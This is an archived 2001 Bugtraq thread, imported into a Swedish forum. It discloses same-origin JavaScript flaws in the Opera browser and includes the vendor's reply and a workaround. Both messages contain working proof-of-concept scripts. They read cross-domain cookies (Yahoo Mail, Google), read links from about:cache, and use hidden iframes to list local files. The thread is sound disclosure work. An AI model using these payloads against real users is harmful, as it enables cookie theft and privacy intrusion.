linux, säkerhet

7506949 2001-11-15 16:36 +0200  /96 rader/ Georgi Guninski <guninski@guninski.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-11-15  23:00  av Brevbäraren
Extern mottagare: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Externa svar till: guninski@guninski.com
Mottagare: Bugtraq (import) <19770>
Ärende: Several javascript vulnerabilities in Opera
------------------------------------------------------------
From: Georgi Guninski <guninski@guninski.com>
To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Message-ID: <3BF3D2EC.C297CD41@guninski.com>

Georgi Guninski security advisory #51, 2001

Several javascript vulnerabilities in Opera

Systems affected:
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

Risk: Medium
Date: 15 November 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Anouncement: I am looking for contracts in the security area - check
http://www.guninski.com

Description: Opera is a multiplatform web browser.  There are several
javascript vulnerabilities in it, basically allowing script in a page
to access a page and its properties in another domain - AFAIK
Netscape call this "Same Origin Vulnerability".  It is possible a
script in web page to access at least cookies and links in arbitrary
domains to which the user has access.  It is also possible a script
to read the the links in the user's cache and  history which at least
have privacy implications if not more.  In some cases cookies and
links in the cahe/history may containg sensitive information such as
usernames/passwords etc.


Details:
Examine the following scripts:
-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------

-2.--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------

In addiotion the HotJava explot at
http://www.guninski.com/hotjava1-desc.html works as Jay@InfoAve.net
pointed out.

Workaround: Disable javascript (Opera suggest enabling "Use cookies
to trace password protected documents")

Vendor status: The vendor was notified on 5 November 2001 and was
asked whether a fix shall be issued and when.  The reply was:
------------------------------------
You should be able to resolve the cookie issue by enabling "Use cookies to trace password protected documents", 
which means that pages with password protection aren't cached, cookies aren't stored, 
the URL shouldn't be displayed in History, etc. 
This is a "paranoia" option, and makes a few pages unusable.
As you are probably aware, many web technologies aren't very secure, 
but it is inconvenient for the user to block these. 
This is why the user should be given a choice to block privacy related information.
------------------------------------

Regards,
Georgi Guninski
http://www.guninski.com
(7506949) /Georgi Guninski <guninski@guninski.com>/(Ombruten)
Kommentar i text 7508092 av Andreas Sandblad <sandblad@acc.umu.se>
7508092 2001-11-16 01:37 +0100  /144 rader/ Andreas Sandblad <sandblad@acc.umu.se>
Sänt av: joel@lysator.liu.se
Importerad: 2001-11-16  04:53  av Brevbäraren
Extern mottagare: Georgi Guninski <guninski@guninski.com>
Extern kopiemottagare: Bugtraq <BUGTRAQ@securityfocus.com>
Mottagare: Bugtraq (import) <19783>
Kommentar till text 7506949 av Georgi Guninski <guninski@guninski.com>
Ärende: Re: Several javascript vulnerabilities in Opera
------------------------------------------------------------
From: Andreas Sandblad <sandblad@acc.umu.se>
To: Georgi Guninski <guninski@guninski.com>
Cc: Bugtraq <BUGTRAQ@securityfocus.com>
Message-ID: <Pine.A41.4.33.0111160110320.76190-100000@stalin.acc.umu.se>

Dear bugtraq,

I mailed Opera one week ago about a similiar javascript vulnerability
in Opera. I was still waiting for any respond from Opera when I saw
Guninski's bugtraq post.

One thing that wasn't mentioned and might not be obvious is that the
vulnerability can also be used to list files on the user's
harddrive. This is because the url file://c:/ is seen as a html-page
by Opera. Thus we can use document.links to retrieve filenames and
directories.

Opera released 6.0 beta 1 for windows three days ago and it's also
vulnerable. In fact it's actually much easier to write the script for
it and easier to make the attack invisible since Opera added better
support to iframe.

Opera 6.0 (not 5.x): List files and directories in c:/
<iframe id="rewrite" src="file://c:/" width=0 height=0></iframe>
<script language="javascript">
s="javascript:t=\'\';for(i=0;(c=document.links.item(i));i++){t+=c};alert(t);";
setTimeout('parent.rewrite.document.location="'+s+'"',1);
</script>

Opera 6.0 (not 5.x): Get google cookie
<iframe id="rewrite" src="http://www.google.com/" width=0 height=0></iframe>
<script language="javascript">
setTimeout('parent.rewrite.document.location="javascript:alert(document.cookie)"',8000);
</script>

My webdemo written for the Opera staff was put on the private url:
http://www.homer.nu/security/opera/ But I don't see any reason to
keep it private now when Guninski made the bug public.

Sincerely,
Andreas Sandblad


On Thu, 15 Nov 2001, Georgi Guninski wrote:

> Georgi Guninski security advisory #51, 2001
>
> Several javascript vulnerabilities in Opera
>
> Systems affected:
> Opera 5.12/Windows, Opera 5.0/Linux - probably other versions
>
> Risk: Medium
> Date: 15 November 2001
>
> Legal Notice:
> This Advisory is Copyright (c) 2001 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or distribute parts
> of it without the author's written permission.
>
> Disclaimer:
> The information in this advisory is believed to be true based on
> experiments though it may be false.
> The opinions expressed in this advisory and program are my own and
> not of any company. The usual standard disclaimer applies,
> especially the fact that Georgi Guninski is not liable for any damages
> caused by direct or  indirect use of the information or functionality
> provided by this advisory or program. Georgi Guninski bears no
> responsibility for content or misuse of this advisory or program or
> any derivatives thereof.
>
> Anouncement:
> I am looking for contracts in the security area - check http://www.guninski.com
>
> Description:
> Opera is a multiplatform web browser.
> There are several javascript vulnerabilities in it, basically allowing
> script in a page to access a page and its properties in another domain -
> AFAIK Netscape call this "Same Origin Vulnerability".
> It is possible a script in web page to access at least cookies and links
> in arbitrary domains to which the user has access.
> It is also possible a script to read the the links in the user's cache and
> history which at least have privacy implications if not more.
> In some cases cookies and links in the cahe/history may containg sensitive information
> such as usernames/passwords etc.
>
>
> Details:
> Examine the following scripts:
> -1.----------------------------------
> a=window.open("http://mail.yahoo.com");
> function f()
> {
> xx=a.document.cookie;
> alert("hi"+xx);
> a.document.open();
> a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
> a.document.close();
> }
> setTimeout("f()",5000);
> -----------------------------------
>
> -2.--------------------------------
> a=window.open("about:cache");
> function f()
> {
> xx=a.document.links[2];
> alert("hi="+xx);
> }
> setTimeout("f()",5000);
> -----------------------------------
>
> In addiotion the HotJava explot at http://www.guninski.com/hotjava1-desc.html works as
> Jay@InfoAve.net pointed out.
>
> Workaround:
> Disable javascript (Opera suggest enabling "Use cookies to trace password protected documents")
>
> Vendor status:
> The vendor was notified on 5 November 2001 and was asked whether a fix shall be issued and when.
> The reply was:
> ------------------------------------
> You should be able to resolve the cookie issue by enabling "Use cookies to trace password protected documents",
> which means that pages with password protection aren't cached, cookies aren't stored,
> the URL shouldn't be displayed in History, etc.
> This is a "paranoia" option, and makes a few pages unusable.
> As you are probably aware, many web technologies aren't very secure,
> but it is inconvenient for the user to block these.
> This is why the user should be given a choice to block privacy related information.
> ------------------------------------
>
> Regards,
> Georgi Guninski
> http://www.guninski.com
>

-- 
    _     _
  o' \,=./ `o
     (o o)
-ooO--(_)--Ooo-
(7508092) /Andreas Sandblad <sandblad@acc.umu.se>/(Ombruten)